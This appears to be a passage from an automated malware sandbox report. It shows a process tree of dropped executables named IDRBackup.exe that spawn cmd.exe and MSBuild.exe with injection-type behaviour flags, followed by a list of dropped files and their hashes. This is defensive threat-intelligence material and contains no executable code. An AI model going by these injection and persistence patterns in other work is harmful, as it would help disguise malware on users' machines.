C:\Users\Admin\AppData\Local\plenished\IDRBackup.exe"C:\Users\Admin\AppData\Local\plenished\IDRBackup.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1616 -
C:\Users\Admin\AppData\Roaming\streamconfig_v3\IDRBackup.exeC:\Users\Admin\AppData\Roaming\streamconfig_v3\IDRBackup.exe6⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2992 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵PID:2748
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD5e2e1839b53a32b855afe3a93e2d90432
SHA16a60039ce0d7c89fb6a2d1fbc7afcd42b4155a2f
SHA256a8da05db09983b2f2259c7bfab112ace68024c12688c1f42e832d50e444a4fad
SHA512883b73b4a5ff1fda1139f3ca1e10fd69732a449cb6b4e964841c978cc2f7f8e189edb6d288e5ef459259b10ab7fb89a74904abcc45d385a19f881e11c9a64b98
-
Filesize
255B
MD5511945e17922dc6e63f3741797c97161
SHA1cfe6e271f10d8c9b1ffd9fbf7a33cc78c8ea5b23
SHA2560673bcb2d8c908cbd9b8baa331ac46a95c36b91111b3ab72c3fd8c25ea97c380
SHA5125853800381063da73f11b30431e56ddb128d8ec46875f91a9e57af30e8ead5c75c5668afdd0a09849433f2e9e6f48477e890e97aad4ce440d5e688cfde8fd0ac
-
Filesize
476KB
MD5e84b92f608db288afcc12c5fe341b6c7
SHA10c2e73f24b90ff2e2bfef547defbe9ab75199e18
SHA256f6c80d7c6ab6ba91cc24e12aa71c5290ca095e0842ae59a460ad71522039deb3
SHA512f76b987138cdf83759a4cc792bfb49f302c950326afcaf104836b800e0a36082dc8639fc1cbc6472b952b538cdb6650f22b3839015db835b8e268e8a98b109db
-
Filesize
442KB
MD5b3c37bc4740f0003575e58edc2bbf765
SHA1edc4bfd3fc3c53b7626d5cb7bea0be8305e69840
SHA256addf16c01572719ef972b895725cd82db0b6ae4ab8929df818cc8365aaa40c45
SHA512fc61bab572c7c3c52b8701acf83480cc9af72899d7d6f27c5fc506a55211ee82191d3ce47ec84b20d009a4ccf04841e5f58db415fa3835a72965df3b92f5702e
-
Filesize
723KB
MD557b69d97abcec8125167a903957a8a4e
SHA1ff7f77c6125734965adb87d3dc16ee22383b3625
SHA25663760f40b6cda43eb12b6f114f4f84f58bfc2808ef2ff1f42a5fa91dae312c98
SHA512e0bbdeab342d8f6474cec561914d83af2acd61e55c898b2ea72767c913b6a657e9b57330935c148e192c39d82ee7fa211c94325141fd3f63bb94544b06c2aadd
-
Filesize
191B
MD55ae5399a686f34807328fecf43ef67b7
SHA19537ff3f3bab6e19fda8b5dcd9883ea8fd4bf726
SHA256dd1ef04c298b2800877a62e417a8ee7fb0d6d6af8e3deebf05de0daff5744a96
SHA512f7d96ffdd9b4632ef65614928260771811a1e075b35b66b9ad7a5af6e23de5a6f0e86f1113e6511fc629d872e6ea1bad83115aff97ca4fe797c8036cc572b179
-
Filesize
6KB
MD5e4211d6d009757c078a9fac7ff4f03d4
SHA1019cd56ba687d39d12d4b13991c9a42ea6ba03da
SHA256388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95
SHA51217257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e
-
Filesize
20KB
MD5c9ff7748d8fcef4cf84a5501e996a641
SHA102867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA2564d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
-
Filesize
435KB
MD521068dfd733435c866312d35b9432733
SHA13d5336c676d3dd94500d0d2fe853b9de457f10fd
SHA256835f1141ece59c36b18e76927572d229136aeb12eff44cb4ba98d7808257c299
SHA51254664a9e60e5a0b148fc4684125b7eac9cfc57d0bc5838204ed587d62e44c3347c0bae3192d5c375b6a74335b4fed4fc53248ba542c59022e9761872e09e3ee7
-
Filesize
1.2MB
MD572fbeac568f11ac964422c183ee09b8b
SHA148168a91ad4da3c481e897b50c17b8539cb5a5b4
SHA2562609667d2649fc9034f386c9fc52c6864da2a819fb22320a1c4143d0c7b549ac
SHA51286767a96e962cbd5f054f0f6ffc45453946b5da5071a0158bd3672300ccc3c1b20239c3b4de760d32caaf1d4b941a86a0a0d9aa592f31d1a8daacc875b35ef61
-
Filesize
3.4MB
MD5afc2464f523f789e7f4bae79b0fa4368
SHA10c9fb159c688b9717dad6d05f6166879b4d29cb0
SHA25634507a016d32bcf709640f2a45e20c5b9c6ca115f50caf57c54a7b81dee5a1cf
SHA512a07df34de475f63351a6e6f8fedff079549b9ceea03983143fb85c09329cdf5a99f274c1ae19656af9bb01c44b6657f9c425ab653fe10b0f3279ce34a34adee4
-
Filesize
3.4MB
MD5d783c2c361c7e057197b8472b00f007b
SHA171e44155a0a3987c29cfa5fc6ad2f18c873eed90
SHA256d114d55a3e876bd2fd6dcc65b32390942f80c2fa1bff66574f8d4aef10459eca
SHA512b056321d2eb49f3fdbf4ad42758d8e8914d85fef8ea5cb9843e0612add017b32f2fb2d5ea8349211a31b9d91cb3a1980e64da2923930a169ce69bed6a190e07b
-
Filesize
59KB
MD5392801a00e8cf7a65ae74b26bb0e01f6
SHA1a2b0f370addfde67f2f0aca8e54c49fe5f850c6d
SHA2569bb9c49a9c396b6a54b219b48c5775bf8d6d061ce9225f3b62c84f73c9688071
SHA51262879925ffc00b87d651139479e26f169fc42755f3887d811693ead439247c5cc22f9f2e451b82f1e06cbb34800b3517fce9a8cc1afac0e07c426c98af8d566a
-
Filesize
1.1MB
MD5630991830afe0b969bd0995e697ab16e
SHA1feda243d83fba15b23d654513dc1f0d70787ba18
SHA256b1fcb0339b9ef4860bb1ed1e5ba0e148321be64696af64f3b1643d1311028cb3
SHA5122f2bf30be615f44e56ecca972a9fcbe27187045e13c468d039645e5cc6d01f990cde32b322965f245bc8fccfd0920f09a0afa1d4de0748ed01dd9ffc1bd24692
-
Filesize
904KB
MD59d255e04106ba7dcbd0bcb549e9a5a4e
SHA1a9becb85b181c37ee5a940e149754c1912a901f1
SHA25602f37a8e3d1790ac90c04bc50de73cd1a93e27caf833a1e1211b9cc6294ecee5
SHA51254c54787a4ca8643271169be403069bc5f1e319a55d6a0ebd84fb0d96f6e9bddc52b0908541d29db04a042b531abd6c05073e27b0b2753196e0055b8b8200b09
-
Filesize
220KB
MD57daa2b7fe529b45101a399b5ebf0a416
SHA1fd73f3561d0cebe341a6c380681fb08841fa5ce6
SHA2562bdf023c439010ce0a786ec75d943a80a8f01363712bbf69afc29d3e2b5306ed
SHA5128e9ec71943c412fe95563e488d91e6ef0041c16a08654ff14b11953f134007657d1e6ec95952f6b9c8b8567a35368840618db06e5cd99abc43ae495a3fbc6b96
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fbd1bbd5b4c1ed3397a6fb301ed8107b
SHA1c95a30a650ba2c1e0eaea50ec9022dc633b2182e
SHA256c457873524af0ad3626abfbeaf7dca0bbf7082087f66a1724e08166039cd356e
SHA5128c75e37ef2f70057510c511f9b60a2f7e98462f663b86126dbd7b8517f1101503b5184e25f2c2d38a72b10adab6b8e16740698c49e4f9917870cc2e406a00083
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2.9MB
MD5a0ec6f52e2963da51e7718fa893dfe9b
SHA1281a97ba2b01e57f17bb57a85cd8a2f79e2dbdd3
SHA256117e88047fa7f0e326e02ecdadd4bbf0ff0acc897a3499c5728a530a566aa796
SHA512941b2509ebd1a5376b97ee4f2ee8658a974aded1f3a424dcc56872987a134057c36bec5780d529ab481fedec69a1e14529f3a45d174897a81621582b66fa38ee
-
Filesize
12KB
MD547cfd05fde4babe79530c7ea730f6dc0
SHA12c055fa81f19d6f024f1f3d5b2dd0d5fde51d87e
SHA2564bb34fe74f86ab389763863ee395a93d73e2d9548c224819ec9055d7c8c4b480
SHA512ece4b4268e0d346e438f6f59fe333f7b6f95e3287791c517ef477935704ad2788e544a877b39abf542cd90a23966302d44cf03fb71e95c4f84ea11e634b3cbd0
-
Filesize
2.0MB
MD5371c165e3e3c1a000051b78d7b0e7e79
SHA12a2ecbbd4840c486b3507a18307369336ec5a1aa
SHA2565ae3838d77c2102766538f783d0a4b4205e7d2cdba4e0ad2ab332dc8ab32fea9
SHA5124e6bd3f85c71a8ff0db1e92675295d5bbd0ee8cf24d4df4150a922e9c25fa1f7116263ac4e55c9a9420416fd0388db593c1fe43d22d0a8d25caa20eeb13f5080
-
Filesize
75KB
MD528f0ccf746f952f94ff434ca989b7814
SHA1506e85d2de6377492d90b98aa20663b0ff3ce32a
SHA2566010e2147a0f51a7bfa2f942a5a9eaad9a294f463f717963b486ed3f53d305c2
SHA512b74ebb9a12079caf7bc074bb977ee94dc6ffcae845c1120026f384953fe2499d4bb0cdb7b6dcb2ff7f37e8135db06048815cc13d1837235eb11fe86e3c4572ee
-
Filesize
209KB
MD5dc6655a38ffdc3c349f13828fc8ec36e
SHA195db71ef7bff8c16ce955c760292bad9f09bb06d
SHA25616126ff5daa3787a159cf4a39aa040b8050ebb66ab90dbb97c503110ef72824a
SHA51284b85f2aaad773cbe039022db3d0c35263343243f0d021d7aa3086904b80dd309e6d2a93613cc774b5db27335f4d2850151e2bc8f4648b0065f66bd3722c3d69
-
Filesize
61KB
MD584bc072f8ea30746f0982afbda3c638f
SHA1f39343933ff3fc7934814d6d3b7b098bc92540a0
SHA25652019f47f96ca868fa4e747c3b99cba1b7aa57317bf8ebf9fcbf09aa576fe006
SHA5126e7648194738e8e49e48c2450eef1d482473cd4e5c0e83f292ac9174488f3f22a3b6ba96f07e024c2ab96613d9db1a97084ca0b3973ed5d88502e0d28e120ef5
-
Filesize
1.9MB
MD5ab9c49747746793ec1dc0a82f99698cb
SHA14e670143317e9ae37882334886cef1d9ea215bd3
SHA2566ba7437f582631f49731bfaaf611bde75afa3196c7fe9bf71a39a325d665b502
SHA512f655ccc431cfd09c3c74fe6689ece27e8369386be153d92cbe9c9dd9d6dd457b0ce8ea3273a0a5550e786a24447de5e410902d66715f9448b425648a4e946718